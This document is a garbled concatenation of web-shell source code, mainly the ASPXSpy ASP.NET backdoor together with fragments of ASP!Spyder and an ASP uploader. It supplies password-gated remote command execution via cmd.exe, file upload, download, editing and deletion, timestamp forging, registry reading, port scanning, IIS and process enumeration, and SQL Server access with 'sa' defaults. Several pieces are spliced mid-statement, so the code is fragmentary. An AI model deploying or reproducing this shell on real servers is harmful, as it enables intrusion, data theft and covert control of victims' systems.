Result+=Rev(NS);
tcp.Close();
}
catch(Exception error)
{
Bin_Error(error.Message);
}
Bin_SuresLabel.Text="
";
}
protected string Rev(NetworkStream instream)
{
string Restr="";
if(instream.CanRead)
{
byte[] buffer=new byte[1024];
instream.Read(buffer, 0, buffer.Length);
Restr=Encoding.ASCII.GetString(buffer);
}
return ""+Restr+"
";
}
protected string Send(NetworkStream instream,string Sendstr)
{
if(instream.CanWrite)
{
byte[] buffer=Encoding.ASCII.GetBytes(Sendstr);
instream.Write(buffer, 0, buffer.Length);
}
return ""+Sendstr+"
";
}
protected void Bin_IISButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible=false;
Bin_MainPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=true;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_iisLabel.Text=Bin_iisinfo();
}
protected void Bin_PortButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=true;
Bin_ScanresLabel.Text="";
}
protected void Bin_RegButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=true;
Bin_PortPanel.Visible=false;
Bin_RegresLabel.Text="";
}
protected void Bin_RegreadButton_Click(object sender, EventArgs e)
{
try
{
string regkey=Bin_KeyTextBox.Text;
string subkey=regkey.Substring(regkey.IndexOf("\")+1, regkey.Length - regkey.IndexOf("\")- 1);
RegistryKey rk=null;
object buffer;
string regstr="";
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_LOCAL_MACHINE")
{
rk=Registry.LocalMachine.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CLASSES_ROOT")
{
rk=Registry.ClassesRoot.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CURRENT_USER")
{
rk=Registry.CurrentUser.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_USERS")
{
rk=Registry.Users.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CURRENT_CONFIG")
{
rk=Registry.CurrentConfig.OpenSubKey(subkey);
}
buffer=rk.GetValue(Bin_ValueTextBox.Text, "NULL");
if (buffer.GetType()==typeof(byte[]))
{
foreach (byte tmpbyte in (byte[])buffer)
{
if ((int)tmpbyte Bin
A:link {
COLOR:#000000; TEXT-DECORATION:None
}
A:visited {
COLOR:#000000; TEXT-DECORATION:None
}
A:active {
COLOR:#000000; TEXT-DECORATION:None
}
A:hover {
COLOR:#000000; TEXT-DECORATION:underline
}
BODY {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
}
#nei {
width:500px;
margin:0px auto;
overflow:hidden
}
#su {
width:300px;
margin:0px auto;
overflow:hidden
}
#cmd {
width:500px;
margin:0px auto;
overflow:hidden
}
function Command(cmd, str)
{
var strTmp=str;
var frm=document.forms[0];
if(cmd=='del')
{
if(confirm('Del It ?'))
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
else return;
}
if(cmd=='change')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='down')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='showatt')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='edit')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='deldir')
{
if(confirm('Del It ?'))
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
else return;
}
if(cmd=='rename' )
{
frm.goaction.value=cmd;
frm.todo.value=str+',';
str=prompt('Please input new filename:', strTmp);
if(str &&(strTmp !=str))
{
frm.todo.value+=str;
frm.submit();
}
else return;
}
if(cmd=='renamedir' )
{
frm.goaction.value=cmd;
frm.todo.value=str+',';
str=prompt('Please input new foldername:', strTmp);
if(str &&(strTmp !=str))
{
frm.todo.value+=str;
frm.submit();
}
else return;
}
if(cmd=='postdata')
{
frm.todo.value=str.value;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='changedata')
{
frm.todo.value=str.value;
frm.intext.value=str.options[str.selectedIndex].innerText
frm.goaction.value=cmd;
frm.submit();
}
}
Copyright(C)2008 Bin -> WwW.RoOTkIt.NeT.Cn
Copyright(C)2008 Bin -> WwW.RoOTkIt.NeT.Cn -> Reverse-IP
FileName :
CreationTime :
LastWriteTime :
LastAccessTime :
Path:
CmdPath : C:\Windows\System32\Cmd.exe
Argument :
/c Set
ConnString :
server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB
Path :
c:\
Name :
localadministrator
Pass :
#l@$ak#.lk;0@P
Port :
43958
CMD :
cmd.exe /c net user
KEY : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
VALUE :
ComputerName
IP :
127.0.0.1
PORT :
21,80,1433,3306,3389,4899,5631,43958,65500
File2
64 Then
index=0
tmp=""
Do
tmp=part(index) & tmp
part(index) = ""
index = index + 1
Loop until part(index) = ""
part(index) = tmp
End If
End Sub
Function fnReadString(part)
Dim tmp
Dim index
tmp = ""
For index = 0 to 64
If part(index) "" Then
tmp = part(index) & tmp
End If
Next
FnReadString = tmp
End Function
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) "" Then sPath = sPath & ""
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
' output mechanism modified for buffering
oFile.Write BufferContent(FileData)
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
' Create the FileUploader
IF REQUEST.QueryString("upload")="@" THEN
Dim Uploader, File
Set Uploader = New FileUploader
' This starts the upload process
Uploader.Upload()
%>
ASPYDrvsInfo
File upload Information:
hAshish for all the help!
+++DONE+++
CLOSE THIS WINDOW
file Type:
file Size: bytes
file Created:
last Modified:
last Accessed:
file Attributes:
sub getit(thestuff)
if right("",1) "" Then
document.myform.txtpath.value = "" & "" & thestuff
Else
document.myform.txtpath.value = "" & thestuff
End If
document.myform.submit()
End sub
ASP!Spyder Apr2003
by ~sir_shagalot
PATH INFO : Volume Label:
Virtual: http://
1
[URL="Retrieve Available Network Drives[/URL]
[URL="SQL Query Analyser[/URL]
[URL="+++LOGOFF+++[/URL]
Delete file from current directory:
------------------------------"
FOLDERz
fo=fo+1
Response.Write "0 " & fold.name & "
"
Next
%>
Directory:
Copyright 2003 Vela iNC.
[ System: ]

/*
Thanks Snailsor,FuYu,BloodSword
Code by Bin
Make in China
Blog: http://www.rootkit.net.cn
E-mail : [email protected]
*/
public string Password="21232f297a57a5a743894a0e4a801fc3";
public string SessionName="ASPXSpy";
public string cookiePass="ASPXSpyCookiePass";
public string Bin_Action="";
public string Bin_Request="";
protected OleDbConnection conn=new OleDbConnection();
protected OleDbCommand comm=new OleDbCommand();
protected void Page_Load(object sender, EventArgs e)
{
//string strkey;
bool isCookied=false;
HttpCookieCollection cookiecoll=Request.Cookies;
foreach (string strkey in cookiecoll.AllKeys)
{
if (strkey==cookiePass)
{
if (cookiecoll[strkey].Value==Password)
{
isCookied=true;
}
break;
}
}
if((Session[SessionName] !="BIN")&&(!isCookied))
{
Bin_login();
}
else
{
if(!IsPostBack)
{
Bin_main();
}
else
{
Bin_Action=Request["goaction"];
if(Bin_Action=="del")
{
Bin_Request=Request["todo"];
Bin_Filedel(Bin_Request, 1);
}
if(Bin_Action=="change")
{
Bin_Request=Request["todo"];
Bin_FileList(Bin_Request);
}
if(Bin_Action=="deldir")
{
Bin_Request=Request["todo"];
Bin_Filedel(Bin_Request, 2);
}
if(Bin_Action=="down")
{
Bin_Request=Request["todo"];
Bin_Filedown(Bin_Request);
}
if(Bin_Action=="rename")
{
Bin_Request=Request["todo"];
Bin_FileRN(Bin_Request, 1);
}
if(Bin_Action=="renamedir")
{
Bin_Request=Request["todo"];
Bin_FileRN(Bin_Request, 2);
}
if(Bin_Action=="showatt")
{
Bin_Request=Request["todo"];
Bin_Fileatt(Bin_Request);
}
if(Bin_Action=="edit")
{
Bin_Request=Request["todo"];
Bin_FileEdit(Bin_Request);
}
if(Bin_Action=="postdata")
{
Bin_Request=Request["todo"];
Session["Bin_Table"]=Bin_Request;
Bin_DataGrid.CurrentPageIndex=0;
Bin_DBstrTextBox.Text="";
Bin_Databind();
}
if(Bin_Action=="changedata")
{
Session["Bin_Table"]=null;
Bin_Request=Request["todo"];
Session["Bin_Option"]=Request["intext"];
Bin_Change();
Bin_DBinfoLabel.Visible=false;
Bin_DBstrTextBox.Text=Bin_Request;
}
if(Session["Bin_Table"] !=null)
{
Bin_Databind();
}
}
}
}
public void Bin_login()
{
Bin_LoginPanel.Visible=true;
Bin_MainPanel.Visible=false;
Bin_MenuPanel.Visible=false;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
}
public void Bin_main()
{
TimeLabel.Text=DateTime.Now.ToString();
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_LoginPanel.Visible=false;
Bin_MainPanel.Visible=true;
Bin_MenuPanel.Visible=true;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
string ServerIP="Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"
";
string HostName="HostName : "+Environment.MachineName+"
";
string OS="OS Version : "+Environment.OSVersion+"";
string IISversion="IIS Version : "+Request.ServerVariables["SERVER_SOFTWARE"]+"
";
string PATH_INFO="PATH_TRANSLATED : "+Request.ServerVariables["PATH_TRANSLATED"]+"
";
InfoLabel.Text="SYS-INFO";
InfoLabel.Text+=ServerIP+HostName+OS+IISversion+PATH_INFO+"";
InfoLabel.Text+=Bin_Process()+"";
}
private bool CheckIsNumber(string sSrc)
{
System.Text.RegularExpressions.Regex reg=new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$");
if(reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public string Bin_iisinfo()
{
string iisinfo="";
string iisstart="";
string iisend="";
string iisstr="IIS://localhost/W3SVC";
int i=0;
try
{
DirectoryEntry mydir=new DirectoryEntry(iisstr);
iisstart="OrderIIS_USERDomainPath";
foreach(DirectoryEntry child in mydir.Children)
{
if(CheckIsNumber(child.Name.ToString()))
{
string dirstr=child.Name.ToString();
string tmpstr="";
DirectoryEntry newdir=new DirectoryEntry(iisstr+"/"+dirstr);
DirectoryEntry newdir1=newdir.Children.Find("root", "IIsWebVirtualDir");
iisinfo+=""+(i=i+1)+"";
iisinfo+=""+newdir1.Properties["AnonymousUserName"].Value+"";
iisinfo+=""+child.Properties["ServerBindings"][0]+"";
iisinfo+=""+newdir1.Properties["Path"].Value+"";
iisinfo+="";
}
}
iisend="";
}
catch(Exception error)
{
Bin_Error(error.Message);
}
return iisstart+iisinfo+iisend;
}
public string Bin_Process()
{
string htmlstr="PROCESS-INFOIDProcessMemorySizeThreads";
string prostr="";
string htmlend="";
try
{
Process[] myprocess=Process.GetProcesses();
foreach(Process p in myprocess)
{
prostr+=""+p.Id.ToString()+"";
prostr+=""+p.ProcessName.ToString()+"";
prostr+=""+p.WorkingSet.ToString()+"";
prostr+=""+p.Threads.Count.ToString()+"";
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
return htmlstr+prostr+htmlend;
}
protected void LoginButton_Click(object sender, EventArgs e)
{
string MD5Pass=FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
if(MD5Pass==Password)
{
Session[SessionName]="BIN";
Response.Cookies.Add(new HttpCookie(cookiePass,Password));
Bin_main();
}
else
{
Bin_login();
}
}
protected void LogoutButton_Click(object sender, EventArgs e)
{
Session.Abandon();
Response.Cookies.Add(new HttpCookie(cookiePass,null));
Bin_login();
}
protected void FileButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_MainPanel.Visible=false;
Bin_FilePanel.Visible=true;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_upTextBox.Text=formatpath(Server.MapPath("."));
Bin_CopyTextBox.Text=formatpath(Server.MapPath("."));
Bin_upTextBox.Text=formatpath(Server.MapPath("."));
Bin_FileList(Server.MapPath("."));
}
protected void MainButton_Click(object sender, EventArgs e)
{
Bin_main();
}
public void Bin_DriveList()
{
string file="";
file+="Drives : ";
string[] drivers=Directory.GetLogicalDrives();
for(int i=0; i < drivers.Length; i++)
{
file+=""+drivers+" ";
}
file+=" WebRoot : "+Server.MapPath(".")+"";
Bin_FileLabel.Text=file;
}
public void Bin_FileList(string Bin_path)
{
Bin_FilePanel.Visible=true;
Bin_CreateTextBox.Text="";
Bin_CopytoTextBox.Text="";
Bin_CopyTextBox.Text=Bin_path;
Bin_upTextBox.Text=Bin_path;
Bin_IISPanel.Visible=false;
Bin_DriveList();
string tmpstr="";
string Bin_Filelist=Bin_FilelistLabel.Text;
Bin_Filelist="";
Bin_Filelist+="";
Bin_Filelist+="NameSize(Byte)";
Bin_Filelist+="ModifyTimeOperate";
try
{
Bin_Filelist+="";
string parstr="";
if(Bin_path.Length < 4)
{
parstr=formatpath(Bin_path);
}
else
{
parstr= formatpath(Directory.GetParent(Bin_path).ToString());
}
Bin_Filelist+="|Parent Directory|";
Bin_Filelist+="";
DirectoryInfo Bin_dir=new DirectoryInfo(Bin_path);
foreach(DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
{
string foldername=formatpath(Bin_path)+"/"+formatfile(Bin_folder.Name);
tmpstr+="";
tmpstr+=""+Bin_folder.Name+"<dir>"+Directory.GetLastWriteTime(Bin_path+"/"+Bin_folder.Name)+"Ren|Att|Del";
tmpstr+="";
}
foreach(FileInfo Bin_file in Bin_dir.GetFiles())
{
string filename=formatpath(Bin_path)+"/"+formatfile(Bin_file.Name);
tmpstr+="";
tmpstr+=""+Bin_file.Name+""+Bin_file.Length+""+Directory.GetLastWriteTime(Bin_path+"/"+Bin_file.Name)+"Edit|Ren|Down|Att|Del";
tmpstr+="";
}
tmpstr+="";
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FilelistLabel.Text=Bin_Filelist+tmpstr;
}
public void Bin_Filedel(string instr,int type)
{
try
{
if(type==1)
{
File.Delete(instr);
}
if(type==2)
{
foreach(string tmp in Directory.GetFileSystemEntries(instr))
{
if(File.Exists(tmp))
{
File.Delete(tmp);
}
else
{
Bin_Filedel(tmp, 2);
}
}
Directory.Delete(instr);
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_FileRN(string instr,int type)
{
try
{
if(type==1)
{
string[] array=instr.Split(',');
File.Move(array[0], array[1]);
}
if(type==2)
{
string[] array=instr.Split(',');
Directory.Move(array[0], array[1]);
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_Filedown(string instr)
{
try
{
FileStream MyFileStream=new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
long FileSize=MyFileStream.Length;
byte[] Buffer=new byte[(int)FileSize];
MyFileStream.Read(Buffer, 0,(int)FileSize);
MyFileStream.Close();
Response.AddHeader("Content-Disposition", "attachment;filename="+instr);
Response.Charset="UTF-8";
Response.ContentType="application/octet-stream";
Response.BinaryWrite(Buffer);
Response.Flush();
Response.End();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_Fileatt(string instr)
{
Bin_AttPanel.Visible=true;
Bin_FilePanel.Visible=true;
try
{
string Att=File.GetAttributes(instr).ToString();
Bin_ReadOnlyCheckBox.Checked=false;
Bin_SystemCheckBox.Checked=false;
Bin_HiddenCheckBox.Checked=false;
Bin_ArchiveCheckBox.Checked=false;
if(Att.LastIndexOf("ReadOnly")!=-1)
{
Bin_ReadOnlyCheckBox.Checked=true;
}
if(Att.LastIndexOf("System")!=-1)
{
Bin_SystemCheckBox.Checked=true;
}
if(Att.LastIndexOf("Hidden")!=-1)
{
Bin_HiddenCheckBox.Checked=true;
}
if(Att.LastIndexOf("Archive")!=-1)
{
Bin_ArchiveCheckBox.Checked=true;
}
Bin_CreationTimeTextBox.Text=File.GetCreationTime(instr).ToString();
Bin_LastWriteTimeTextBox.Text=File.GetLastWriteTime(instr).ToString();
Bin_AccessTimeTextBox.Text=File.GetLastAccessTime(instr).ToString();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_AttLabel.Text=instr;
Session["FileName"]=instr;
Bin_DriveList();
}
public void Bin_FileEdit(string instr)
{
Bin_FilePanel.Visible=true;
Bin_EditPanel.Visible=true;
Bin_DriveList();
Bin_EditpathTextBox.Text=instr;
StreamReader SR=new StreamReader(instr, Encoding.Default);
Bin_EditTextBox.Text=SR.ReadToEnd();
SR.Close();
}
protected void Bin_upButton_Click(object sender, EventArgs e)
{
string uppath=Bin_upTextBox.Text;
if(uppath.Substring(uppath.Length - 1, 1)!=@"/")
{
uppath=uppath+@"/";
}
try
{
Bin_UpFile.PostedFile.SaveAs(uppath+Path.GetFileName(Bin_UpFile.Value));
}
catch(Exception error)
{
Bin_Error(error.Message);
}
Bin_FileList(uppath);
}
public void Bin_Error(string error)
{
Bin_ErrorLabel.Text="Error : "+error;
}
public string formatpath(string instr)
{
instr=instr.Replace(@"", "/");
if(instr.Length < 4)
{
instr=instr.Replace(@"/", "");
}
if(instr.Length==2)
{
instr=instr+@"/";
}
instr=instr.Replace(" ", "%20");
return instr;
}
public string formatfile(string instr)
{
instr=instr.Replace(" ", "%20");
return instr;
}
protected void Bin_GoButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewFileButton_Click(object sender, EventArgs e)
{
string newfile=Bin_CreateTextBox.Text;
string filepath=Bin_upTextBox.Text;
filepath=filepath+"/"+newfile;
try
{
StreamWriter sw=new StreamWriter(filepath, true, Encoding.Default);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewdirButton_Click(object sender, EventArgs e)
{
string dirpath=Bin_upTextBox.Text;
string newdir=Bin_CreateTextBox.Text;
newdir=dirpath+"/"+newdir;
try
{
Directory.CreateDirectory(newdir);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CopyButton_Click(object sender, EventArgs e)
{
string copystr=Bin_CopyTextBox.Text;
string copyto=Bin_CopytoTextBox.Text;
try
{
File.Copy(copystr, copyto);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text="";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CutButton_Click(object sender, EventArgs e)
{
string copystr=Bin_CopyTextBox.Text;
string copyto=Bin_CopytoTextBox.Text;
try
{
File.Move(copystr, copyto);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text="";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SetButton_Click(object sender, EventArgs e)
{
try
{
string FileName=Session["FileName"].ToString();
File.SetAttributes(FileName, FileAttributes.Normal);
if(Bin_ReadOnlyCheckBox.Checked)
{
File.SetAttributes(FileName, FileAttributes.ReadOnly);
}
if(Bin_SystemCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.System);
}
if(Bin_HiddenCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.Hidden);
}
if(Bin_ArchiveCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.Archive);
}
if(FileName.Substring(FileName.Length - 1, 1)=="/")
{
Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
else
{
File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("alert('Success!')");
}
protected void Bin_EditButton_Click(object sender, EventArgs e)
{
try
{
StreamWriter SW=new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
SW.Write(Bin_EditTextBox.Text);
SW.Close();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("alert('Success!')");
}
protected void Bin_BackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SbackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CmdButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=true;
Bin_SQLPanel.Visible=false;
Bin_CmdLabel.Text="";
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
}
protected void Bin_RunButton_Click(object sender, EventArgs e)
{
try
{
Process Cmdpro=new Process();
Cmdpro.StartInfo.FileName=Bin_CmdPathTextBox.Text;
Cmdpro.StartInfo.Arguments=Bin_CmdShellTextBox.Text;
Cmdpro.StartInfo.UseShellExecute=false;
Cmdpro.StartInfo.RedirectStandardInput=true;
Cmdpro.StartInfo.RedirectStandardOutput=true;
Cmdpro.StartInfo.RedirectStandardError=true;
Cmdpro.Start();
string cmdstr=Cmdpro.StandardOutput.ReadToEnd();
cmdstr=cmdstr.Replace("", ">");
Bin_CmdLabel.Text=""+cmdstr+"
";
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_SQLButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_Scroll.Visible=false;
Bin_DBmenuPanel.Visible=false;
Bin_dirPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
}
protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"]=null;
Bin_SQLconnTextBox.Text="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
Bin_SQLRadioButton.Checked=true;
Bin_AccRadioButton.Checked=false;
Bin_AccPanel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_DBmenuPanel.Visible=false;
Bin_dirPanel.Visible=false;
}
protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"]=null;
Bin_SQLconnTextBox.Text=@"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
Bin_SQLRadioButton.Checked=false;
Bin_AccRadioButton.Checked=true;
Bin_DBmenuPanel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_dirPanel.Visible=false;
}
protected void OpenConnection()
{
if(conn.State==ConnectionState.Closed)
{
try
{
conn.ConnectionString=Bin_SQLconnTextBox.Text;
comm.Connection=conn;
conn.Open();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
}
protected void CloseConnection()
{
if(conn.State==ConnectionState.Open)
conn.Close();
conn.Dispose();
comm.Dispose();
}
public DataTable Bin_DataTable(string sqlstr)
{
OleDbDataAdapter da=new OleDbDataAdapter();
DataTable datatable=new DataTable();
try
{
OpenConnection();
comm.CommandType=CommandType.Text;
comm.CommandText=sqlstr;
da.SelectCommand=comm;
da.Fill(datatable);
}
catch(Exception)
{
}
finally
{
CloseConnection();
}
return datatable;
}
protected void SQL_SumbitButton_Click(object sender, EventArgs e)
{
try
{
Session["Bin_Table"]=null;
Bin_DataGrid.CurrentPageIndex=0;
Bin_DataGrid.AllowPaging=true;
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
Bin_DBinfoLabel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_Scroll.Visible=false;
Bin_dirPanel.Visible=false;
OpenConnection();
DataTable ver=Bin_DataTable(@"SELECT @@VERSION");
DataTable dbs=Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
DataTable cdb=Bin_DataTable(@"SELECT DB_NAME()");
DataTable rol=Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
DataTable owner=Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
string dbo="";
if(owner.Rows[0][0].ToString()=="1")
{
dbo="db_owner";
}
else
{
dbo="public";
}
if(rol.Rows[0][0].ToString()=="1")
{
dbo="sa";
}
string db_info="";
db_info="SQLversion : "+ver.Rows[0][0].ToString()+"
";
string db_name="";
for(int i=0; i < dbs.Rows.Count; i++)
{
db_name+=dbs.Rows[0].ToString().Replace(cdb.Rows[0][0].ToString(), ""+cdb.Rows[0][0].ToString()+"")+" | ";
}
db_info+="DataBase : "+db_name+"
";
db_info+="SRVROLEMEMBER : "+dbo+"";
Bin_DBinfoLabel.Text=db_info;
}
if(Bin_AccRadioButton.Checked)
{
Bin_DataGrid.Visible=false;
Bin_SAexecButton.Visible=false;
Bin_Accbind();
}
}
catch(Exception E)
{
Bin_Error(E.Message);
}
}
protected void Bin_Accbind()
{
try
{
Bin_DBmenuPanel.Visible=false;
Bin_AccPanel.Visible=true;
OpenConnection();
DataTable acctable=new DataTable();
acctable=conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
string accstr="";
accstr+="Tables Count : "+acctable.Rows.Count+"
Please select a database : ";
for(int i=0; i < acctable.Rows.Count; i++)
{
accstr+=""+acctable.Rows.ItemArray[2].ToString()+"";
}
if(Session["Bin_Table"] !=null)
{
accstr+=""+Session["Bin_Table"]+"";
}
accstr+="";
Bin_AccinfoLabel.Text=accstr;
CloseConnection();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_Databind()
{
try
{
Bin_SAexecButton.Visible=false;
Bin_Accbind();
Bin_Scroll.Visible=true;
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
